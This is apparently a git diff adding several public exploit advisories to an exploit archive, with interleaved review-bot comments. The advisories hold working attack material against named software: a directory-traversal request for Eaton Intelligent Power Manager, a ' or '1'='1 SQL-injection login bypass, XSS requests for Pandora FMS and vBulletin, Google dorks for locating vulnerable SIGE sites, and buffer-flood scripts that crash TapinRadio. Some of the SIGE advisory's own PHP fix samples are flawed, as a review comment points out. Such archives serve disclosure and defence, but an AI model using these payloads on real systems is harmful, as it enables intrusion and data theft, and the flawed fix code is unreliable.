diff --git a/exploits/hardware/webapps/48614.txt b/exploits/hardware/webapps/48614.txt
new file mode 100644
index 000000000..717c037e3
--- /dev/null
+++ b/exploits/hardware/webapps/48614.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal
+# Date: 2018-09-29
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://powerquality.eaton.com/
+# Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999
+# Version: v1.6
+# Tested on: Windows
+
+# CVE-2018-12031
+# https://nvd.nist.gov/vuln/detail/CVE-2018-12031
+# https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
+
+# PoC
+To exploit vulnerability, someone could use
+'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../'
+request to get some informations from the target.
+
+GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host
+HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0)
+Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49165.txt b/exploits/multiple/webapps/49165.txt
new file mode 100644
index 000000000..95aaa00d5
--- /dev/null
+++ b/exploits/multiple/webapps/49165.txt
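Review bot: The GET request in the PoC ends in `windows/System32/drivers/etc/host`, but the Windows hosts file is named `hosts`, so the example as written asks for a file that normally does not exist and will not demonstrate the traversal; the path should read `.../drivers/etc/hosts` or name a file the author actually retrieved. The write-up also gives no remediation beyond the CVE link: the server should resolve the `firmware` value against its firmware directory and refuse any request whose canonical path falls outside it. For detection, `..` sequences in the `firmware` parameter of `node_upgrade_srv.js` requests are a precise signature for this issue.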
@@ -0,0 +1,20 @@ +# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection +# Date: 2020–11–17 +# Exploit Author: Anurag Kumar Rawat(A1C3VENOM) +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/ +# Version: 1.1 +# Tested on Parrot os(Linux) + +Attack Vector: +An attacker can gain admin panel access using malicious sql injection quiries. + +Steps to reproduce: +1. Open admin login page using following URl: +-> http://localhost/erms/admin/index.php + +2. Now put below Payload in both the fields( User ID & Password) +Payload: ' or '1'='1 + +3)Server accept this payload and attacker successfully bypassed admin panel +without any credentials \ No newline at end of file diff --git a/exploits/php/webapps/39033.py b/exploits/php/webapps/39033.py index 83c91739a..1095f0049 100755 --- a/exploits/php/webapps/39033.py +++ b/exploits/php/webapps/39033.py @@ -1,17 +1,17 @@ #!/usr/bin/env python -# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header +# Exploit Title: Joomla 1.5 - 3.4.6 Object Injection RCE X-Forwarded-For header # Date: 12/17/2015 # Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs) # Vendor Homepage: https://www.joomla.org/ # Software Link: http://joomlacode.org/gf/project/joomla/frs/ -# Version: Joomla 1.5 - 3.4.5 +# Version: Joomla 1.5 - 3.4.6 # Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable) # CVE : CVE-2015-8562 ''' - Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562 + Joomla 1.5 - 3.4.6 Object Injection RCE - CVE-2015-8562 PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): diff --git a/exploits/php/webapps/48700.txt b/exploits/php/webapps/48700.txt new file mode 100644 index 000000000..5c18b5607 --- /dev/null +++ b/exploits/php/webapps/48700.txt 
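Review bot: The advisory names only the login page `http://localhost/erms/admin/index.php` and never the request field names or the PHP file and query they reach, so a reader cannot tell which statement the `' or '1'='1` value is concatenated into and a defender has nothing concrete to patch or alert on. A line such as `Vulnerable parameters: [User ID and Password POST field names]` plus the affected script should be added. The fix is the standard one, a prepared statement with bound parameters for the login query; the payload presumably only works because both fields are interpolated into the SQL string verbatim, which the advisory should confirm.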
@@ -0,0 +1,54 @@ +# Exploit Title: PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting +# Date: 2020-08-20 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://pandorafms.org/ +# Software Link: https://pandorafms.org/features/free-download-monitoring-software/ +# Version: 7.0NG747 +# Tested on: Windows/Linux/ISO + +# Link https://github.com/EmreOvunc/Pandora-FMS-7.0-NG-747-Stored-XSS + +# Description +A stored cross-site scripting (XSS) in Pandora FMS 7.0 NG 747 can result in +an attacker performing malicious actions to users who open a maliciously +crafted link or third-party web page. (Workspace >> Issues >> List of +issues >> Add - Attachment) + +# PoC + +To exploit vulnerability, someone could use a POST request to +'/pandora_console/index.php' by manipulating 'filename' parameter in the +request body to impact users who open a maliciously crafted link or +third-party web page. + +POST /pandora_console/index.php?sec=workspace&sec2=operation/incidents/incident_detail&id=3&upload_file=1 +HTTP/1.1 +Host: [HOST] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) +Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +boundary=---------------------------188134206132629608391758747427 +Content-Length: 524 +DNT: 1 +Connection: close +Cookie: PHPSESSID=3098fl65su4l237navvq6d5igs +Upgrade-Insecure-Requests: 1 + +-----------------------------188134206132629608391758747427 +Content-Disposition: form-data; name="userfile"; filename="\">.png" +Content-Type: image/png + +"> +-----------------------------188134206132629608391758747427 +Content-Disposition: form-data; name="file_description" + +desc +-----------------------------188134206132629608391758747427 +Content-Disposition: form-data; name="upload" + +Upload 
+-----------------------------188134206132629608391758747427-- \ No newline at end of file diff --git a/exploits/php/webapps/49064.txt b/exploits/php/webapps/49064.txt new file mode 100644 index 000000000..4b948e8f8 --- /dev/null +++ b/exploits/php/webapps/49064.txt 
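Review bot: The multipart body in the PoC has lost its payload: the `filename` value reads `\">.png` and the part body is a bare `">`, so the markup that followed the closing quote appears to have been stripped between the author's submission and this file, and the request as committed no longer demonstrates the stored XSS it describes. The same stripping affects the payload lines in 49180.txt, 49204.txt, 49208.txt and 49209.txt in this commit; all five should be compared with the originals before merge. `Content-Length: 524` also no longer matches the body shown. For remediation, the uploaded filename should be HTML-encoded wherever the issue detail page renders it and restricted to a conservative character set on upload.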
@@ -0,0 +1,316 @@ +# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities +# Exploit Author: Vulnerability-Lab +# Date: 2020-11-11 +# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended +# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended +# Version: 3.5.3 + +Document Title: +=============== +SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2265 + + +Release Date: +============= +2020-11-11 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2265 + + +Common Vulnerability Scoring System: +==================================== +7.8 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +2.000€ - 3.000€ + + +Product & Service Introduction: +=============================== +It offers numerous opportunities to present pictures quickly and easily +in articles. The unique feature of the plugin is +that you can control any parameter on the syntax call. Editor Button - +SIGE Parameters: With the button, you can set the +parameters very easy on-the-fly in an article. It is an excellent +addition to SIGE. Highlights are: parameter call, watermark +function, read IPTC data, thumbnail storage, crop function, sort by +modification date, output as a list, CSS Image Tooltip, +Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was +rewritten entirely and equipped with numerous innovations. +The absolute highlight is the turbo mode. This feature doesn't exist in +any other plugin for Joomla!. In Turbo Mode 2 text files +are created from the HTML output of the gallery and loaded in successive +runs. This feature eliminates the tedious editing +process of each image. 
In a test with 50 large images, the creation of a +gallery with all the extra features (save thumbnails, +watermark generation, resize original images, etc.) without turbo mode +lasted approximately 17 seconds. In turbo mode, it only +took 1 second, and the gallery on the same scale was available! For +calling the syntaxes, additionally, an Editor Button has +been programmed. It makes it very easy to choose the required syntax, +showing all the settings and parameters of the plugin. +It is a great enrichment in using the SIGE plugin. + +(Copy of the Homepage: +https://kubik-rubik.de/sige-simple-image-gallery-extended ) +(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ; +https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ; +https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ ) + + +Abstract Advisory Information: +============================== +An independent vulnerability laboratory researcher discovered multiple +web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 & +v3.5.3 pro extension for joomla. 
+ + +Affected Product(s): +==================== +Vendor: +Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro - +Joomla Extension (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-11-10: Researcher Notification & Coordination (Security Researcher) +2020-11-11: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Open Authentication (Anonymous Privileges) + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Full Disclosure + + +Technical Details & Description: +================================ +1.1 +A file include vulnerability has been discovered in the official Simple +Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla. +The web vulnerability allows remote attackers to unauthorized upload +web-shells or malicious contents to compromise the local file-system. + +The vulnerability is located in the img parameter of the print.php file. +Remote attackers are able to upload images to the unrestricted assets +path to compromise the web-applications file-system and involved +database management system. Exploitation requires no user interaction +and only +a low privileged user account to upload images. + + +1.2 +Multiple non-persistent cross site web vulnerabilities has been +discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 & +v3.5.3 pro extension for joomla. +The vulnerability allows remote attackers to inject own malicious script +codes with non-persistent attack vector to compromise browser to +web-application requests from the client-side. + +The non-persistent cross site scripting web vulnerabilities are located +in the `name` and `title` parameters of the `print.php` file. 
+Remote attackers without user or guest privileges are able to make own +malicious special crafted links to compromise client-side +GET method requests. The attack vector is non-persistent and the issue +affects the client-side. + +Successful exploitation of the vulnerabilities results in session +hijacking, non-persistent phishing attacks, non-persistent +external redirects to malicious source and non-persistent client-side +manipulation of affected application modules. + + +Proof of Concept (PoC): +======================= +1.1 +The remote file include web vulnerability can be exploited by remote +attackers without privileged user account or user interaction. +For security demonstration or to reproduce the persistent cross site web +vulnerability follow the provided information and steps below to continue. + + +Dork(s): +intext:"Powered by Simple Image Gallery Extended" +intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de" + + +PoC: Exploitation +http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI +VULNERABILITY!]&name=[NAME]%20title=[TITLE] + + +1.2 +The non-persistent cross site scripting web vulnerability can be +exploited by remote attackers without privileged user account and with +low user interaction. +For security demonstration or to reproduce the persistent cross site web +vulnerability follow the provided information and steps below to continue. 
+ + +Dork(s): +intext:"Powered by Simple Image Gallery Extended" +intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de" + + +PoC: Payload +"> +'> +'> + +PoC: Example +http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE] +http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT +XSS] + + +PoC: Exploitation +http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php +?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E + + +Solution - Fix & Patch: +======================= +1.1 +The remote file include vulnerability issue can be resolved by the +following steps ... + +Example : +?php +$files=array('test.gif'); +if(in_array($_GET['file'], $files)){ +include ($_GET['file']); +} +? +* If you are a server administrator, turn off allow_url_fopen from the file + +* Or do it with the ini_set command. Only for (RFI) +?php +ini_set('allow_url_fopen ', 'Off'); +? + +* We can use the strpos command to check that if the address is: // +http, the file will not be enclosed +?php +$strpos = strpos($_GET['url'],'http://'); +if(!$strpos){ +include($_GET['url']); +} +? + +* Using str_replace we can give the given address from two characters +"/", "." Let's clean up +?php +$url=$_GET['url']; +$url = str_replace("/", "", $url); +$url = str_replace(".", "", $url); +include($url); +? + + +1.2 +The client-side cross site scripting vulnerabilities can be resolved by +the following steps ... +1. Encode and escape as parse the name and title parameters +2. Filter the input for special chars and disallow them in parameters + + +Security Risk: +============== +1.1 +The securit risk of the remote file include vulnerability in the img +path of the web-application request is estimated as high. 
+ +1.2 +The security risk of the non-persistent cross site scripting +vulnerabilities is estimated as medium. + + +Credits & Authors: +================== +h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec +Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. 
All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/exploits/php/webapps/49180.txt b/exploits/php/webapps/49180.txt new file mode 100644 index 000000000..5220768ca --- /dev/null +++ b/exploits/php/webapps/49180.txt @@ -0,0 +1,32 @@ +# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery +# Exploit Author: Dipak Panchal(th3.d1p4k) +# Vendor Homepage: https://phpgurukul.com +# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel +# Version: 5 +# Tested on Windows 10 + +Attack Vector: +An attacker can craft HTML page containing POST information to have the +victim sign into an attacker's account, where the victim can add +information assuming he/she is logged into the correct account, where in +reality, the victim is signed into the attacker's account where the changes +are visible to the attacker. + +Exploit: + + + + +
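Review bot: The remote-file-include fix offered in the "Solution" section is itself wrong: `$strpos = strpos($_GET['url'],'http://'); if(!$strpos){ include($_GET['url']); }` includes the URL exactly when it starts with `http://`, because `strpos()` returns `0` for a match at offset zero and `!0` is true, so the sample permits the case it claims to block. The `ini_set('allow_url_fopen ', 'Off')` example cannot work either: `allow_url_fopen` is a `PHP_INI_SYSTEM` directive that `ini_set()` cannot change at runtime, the key has a trailing space, and the directive that governs `include` of URLs is `allow_url_include`. The only sound example in that section is the `in_array($_GET['file'], $files)` allow-list; the `str_replace` variant should be dropped, since stripping `/` and `.` is not a substitute for an allow-list of permitted files. The description is also inconsistent with the PoC, calling the issue an upload of web-shells in section 1.1 while the PoC is an `img` parameter pointing at a remote URL.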
+ + + + +
+ + + + +Mitigation: +Please add a csrf token to login request or make some type prompt that the +session has ended when the new login from attacker occurs. \ No newline at end of file diff --git a/exploits/php/webapps/49204.txt b/exploits/php/webapps/49204.txt new file mode 100644 index 000000000..22d469727 --- /dev/null +++ b/exploits/php/webapps/49204.txt @@ -0,0 +1,17 @@ +# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting +# Date: 04-12-2020 +# Exploit Author: Pruthvi Nekkanti +# Vendor Homepage: https://phpgurukul.com +# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ +# Version: 1.0 +# Tested on: Kali Linux + +Attack vector: +This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. + +Vulnerable Parameters: Admin Username. + +Steps-To-Reproduce: +1. Go to the Product admin panel change the admin username +2. Put this payload in admin username field:"> +3. Now go to the website and the XSS will be triggered. \ No newline at end of file diff --git a/exploits/php/webapps/49208.txt b/exploits/php/webapps/49208.txt new file mode 100644 index 000000000..0a668289d --- /dev/null +++ b/exploits/php/webapps/49208.txt 
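Review bot: The `Exploit:` section consists only of blank lines, so the HTML form the attack-vector paragraph refers to is not in the file and the advisory cannot be reproduced as committed; it should not be merged until the form is restored from the submission. The header is inconsistent with itself: the title says version 2.1, `# Version:` says 5, and `# Software Link:` is a bare path rather than a URL. On mitigation, binding the login form to an anti-CSRF token is the right fix, and issuing the session cookie with `SameSite=Lax` or `SameSite=Strict` would block the cross-site POST as a second layer.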
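Review bot: The payload in step 2 ends at `field:">` with nothing after it, so the script element appears to have been stripped and the steps cannot be followed as written. The "Attack vector" paragraph also overstates the exposure: step 1 changes the admin username from the admin panel, so the precondition is an administrator account, which should be stated up front. The fix is output encoding of the username with `htmlspecialchars()` wherever the application echoes it.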
@@ -0,0 +1,23 @@ +# Exploit Title: Savsoft Quiz 5 - 'Skype ID' Stored XSS +# Exploit Author: Dipak Panchal(th3.d1p4k) +# Vendor Homepage: https://savsoftquiz.com +# Software Link: https://github.com/savsofts/savsoftquiz_v5 +# Version: 5 +# Tested on Windows 10 + +Attack Vector: +This vulnerability can results attacker to inject the XSS payload in User +Registration section and each time admin visits the manage user section +from admin panel, and home page too. XSS triggers and attacker can able to +steal the cookie according to the crafted payload. + +Steps to reproduce: +1. Create new account and verified it. + +2. Navigate to Edit Profile: +-> http://localhost/savsoftquiz/index.php/user/edit_user/123 + +3. Put the below Payload in Skype ID field. and submit it. +Payload: abcd + +4. You will get XSS popup. \ No newline at end of file diff --git a/exploits/php/webapps/49209.txt b/exploits/php/webapps/49209.txt new file mode 100644 index 000000000..06ea8299c --- /dev/null +++ b/exploits/php/webapps/49209.txt 
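Review bot: The Skype ID payload in step 3 is shown as `abcd`, which is plain text, so the markup around it appears to have been stripped and the step no longer carries the payload the advisory describes; the hunk should be checked against the original submission. The write-up should also name the templates where the value is rendered unescaped (it mentions the manage-user page and the home page) so a fix can be targeted; escaping the field on output is the remediation.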
@@ -0,0 +1,28 @@ +# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting +# Date: 05.09.2020 +# Author: Vincent666 ibn Winnie +# Software Link: https://www.vbulletin.com/en/features/ +# Tested on: Windows 10 +# Web Browser: Mozilla Firefox & Opera +# Google Dorks: "Powered by vBulletin® Version 5.6.3" + +Go to the "Admin CP" - click on "Styles" - click "Style Manager" - +Choose "Denim" or other theme and choose action "Add new template" and +click "Go". + +Put on the title "1" and template "1" and "Save and Reload". Now you +can catch the new URL with HTTP Live Headers or with hands. + +So..we have Url : + +https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0 + +Test it with hands and get cross site scripting. Use for tests +different browsers. I use Mozilla Firefox and Opera. + +https://localhost/admincp/template.php?templateid=1&group="">&expandset=&searchset=&searchstring=&do=edit&windowScrollTop= + +Picture: + +https://imgur.com/a/b6gH5Fn \ No newline at end of file diff --git a/exploits/windows/dos/49206.txt b/exploits/windows/dos/49206.txt new file mode 100644 index 000000000..178a59860 --- /dev/null +++ b/exploits/windows/dos/49206.txt 
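Review bot: The PoC runs inside `admincp/template.php`, so the precondition is an administrator session, and the advisory should say so: an account that can already create and edit templates can place arbitrary markup in the site's pages, so a reflected XSS in the `group` parameter gains that user nothing unless it can be triggered cross-site against an administrator. The write-up should therefore state whether the admin CP request carries a CSRF token that covers `do=edit`, because that decides whether the issue is exploitable at all. It also shows two different `templateid` values (608 and 1) without explaining the change.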
@@ -0,0 +1,30 @@ +# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC) +# Date: 2020-05-12 +# Exploit Author: Ismael Nava +# Vendor Homepage: http://www.raimersoft.com/ +# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe +# Version: 2.13.7 x64 +# Tested on: Windows 10 Home x64 + +#STEPS +# Open the program TapinRadio +# In Settings select Preferences option +# Click in Miscellaneous and click in Set Application Proxy +# Run the python exploit script, it will create a new .txt files +# Copy the content of the file "Mikon.txt" +# Paste the content in the field Username and Address and click in OK +# Click in Ok again +# After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again +# End :) + + +buffer = 'K' * 20000 + +try: + file = open("Mikon.txt","w") + file.write(buffer) + file.close() + + print("Archive ready") +except: + print("Archive no ready") \ No newline at end of file diff --git a/exploits/windows/dos/49207.txt b/exploits/windows/dos/49207.txt new file mode 100644 index 000000000..927ff39a9 --- /dev/null +++ b/exploits/windows/dos/49207.txt @@ -0,0 +1,29 @@ +# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC) +# Date: 2020-05-12 +# Exploit Author: Ismael Nava +# Vendor Homepage: http://www.raimersoft.com/ +# Software Link: https://www.raimersoft.com/rarmaradio.html +# Version: 2.75.5 +# Tested on: Windows 10 Home x64 +# CVE : n/a + +#STEPS +# Open the program TapinRadio +# In Edit select Settings option +# Click in Network +# Run the python exploit script, it will create a new .txt files +# Copy the content of the file "Paimon.txt" +# Paste the content in the field Username, Address and Server and click in OK +# End :) + + +buffer = 'K' * 20000 + +try: + file = open("Paimon.txt","w") + file.write(buffer) + file.close() + + print("Archive ready") +except: + print("Archive no ready") \ No newline at end of file 
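Review bot: The file handling in the script does not close the handle when the write fails, and the bare `except:` hides the reason: `open()` outside a `with` block means `file.close()` is skipped if `write()` raises, and `except:` also swallows `KeyboardInterrupt`. Use `with open("Mikon.txt", "w") as f: f.write(buffer)` and catch `OSError` so a genuine error is reported instead of the generic "Archive no ready". 49207.txt in this commit has the same pattern.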
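Review bot: The header disagrees with itself and with the steps: the title says RarmaRadio 2.72.5, `# Version:` says 2.75.5, and the first step reads `# Open the program TapinRadio`, which is the product of the sibling advisory 49206.txt; one of the two version strings and the product name should be corrected. The steps also end at "End :)" without saying what the observable effect is, so a line stating what happens after clicking OK (the application closes, any exception text) would let a reader judge the impact claimed in the title.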
diff --git a/exploits/windows/local/49015.txt b/exploits/windows/local/49015.txt new file mode 100644 index 000000000..32951e2e5 --- /dev/null +++ b/exploits/windows/local/49015.txt @@ -0,0 +1,32 @@ +# Exploit Title: Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path +# Discovery by: Erika Figueroa +# Discovery Date: 2020-11-07 +# Vendor Homepage: https://www.realtek.com/en/ +# Tested Version: 1.0.0.55 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 8.1 x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """ + +Realtek Audio Service RtkAudioService C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe Auto +# Service info: + +C:\>sc qc "RtkAudioService" +[[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: RtkAudioService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe + GRUPO_ORDEN_CARGA : PlugPlay + ETIQUETA : 0 + NOMBRE_MOSTRAR : Realtek Audio Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49158.txt b/exploits/windows/local/49158.txt new file mode 100644 index 000000000..8d2780566 --- /dev/null +++ b/exploits/windows/local/49158.txt 
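Review bot: The discovery command filters with `findstr /i "CodeMeter"`, which keeps only lines containing that word, so it cannot have produced the `Realtek Audio Service ... RtkAudioService64.exe` line shown beneath it; the filter is a leftover from another advisory and should be removed (49158.txt in this commit carries the same leftover). More importantly, none of the unquoted-path write-ups in this commit (49015.txt, 49158.txt, 49203.txt, 49205.txt) state whether a standard user can write to `C:\` or under `C:\Program Files\`, and by default neither is writable, so the "local user" precondition in the `#Exploit:` paragraph is unverified; an advisory should show the ACL of the relevant directory. The remediation is also missing from all four: quote the image path, e.g. `sc config "RtkAudioService" binPath= "\"C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe\""`.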
@@ -0,0 +1,41 @@ +# Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path +# Discovery by: manuel Alvarez +# Discovery Date: 2020-11-07 +# Vendor Homepage: https://www.realtek.com/en/ +# Tested Version: 1.0.64.7 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr /i +"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i +/v """ + +Andrea RT Filters Service +AERTFilters C:\Program Files\IDT\WDM\AESTSr64.exe + Auto + +# Service info: + +C:\Users\ComoDVD>sc qc AESTFilters +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: AESTFilters + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Andrea ST Filters Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert +their code in the system root path undetected by the OS or other security +applications where it could potentially be executed during application +startup or reboot. If successful, the local user's code would execute with +the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49203.txt b/exploits/windows/local/49203.txt new file mode 100644 index 000000000..53d0928a3 --- /dev/null +++ b/exploits/windows/local/49203.txt 
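Review bot: The names in this advisory do not agree with each other: the title says `AERTSr64.EXE` while the output shows `AESTSr64.exe`; the wmic line lists the service as `AERTFilters`, the `sc qc` output as `AESTFilters`; and the display name is "Andrea RT Filters Service" in one place and "Andrea ST Filters Service" in another. The binary lives under `C:\Program Files\IDT\WDM\`, so attributing it to Realtek in the title and vendor homepage also looks wrong; the header should be reconciled against the actual `sc qc` output before merge.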
@@ -0,0 +1,30 @@ +# Exploit Title: Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path +# Date: 2020-9-3 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: http://rumble.sf.net/ +# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe +# Version: Version 0.51.3135 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + + +# Service info: + +C:\Users\m507>sc qc "RumbleService" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: RumbleService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Rumble\rumble_win32.exe --service + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Rumble Mail Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49205.txt b/exploits/windows/local/49205.txt new file mode 100644 index 000000000..69f50d3c0 --- /dev/null +++ b/exploits/windows/local/49205.txt 
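Review bot: The `# Exploit:` section is a single sentence and the advisory shows neither a discovery step nor the directory permissions, so it does not establish the write-permission precondition the issue depends on; the `sc qc` output alone only shows an unquoted `BINARY_PATH_NAME` with a trailing `--service` argument. The remediation is absent and is one line: `sc config "RumbleService" binPath= "\"C:\Program Files\Rumble\rumble_win32.exe\" --service"`.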
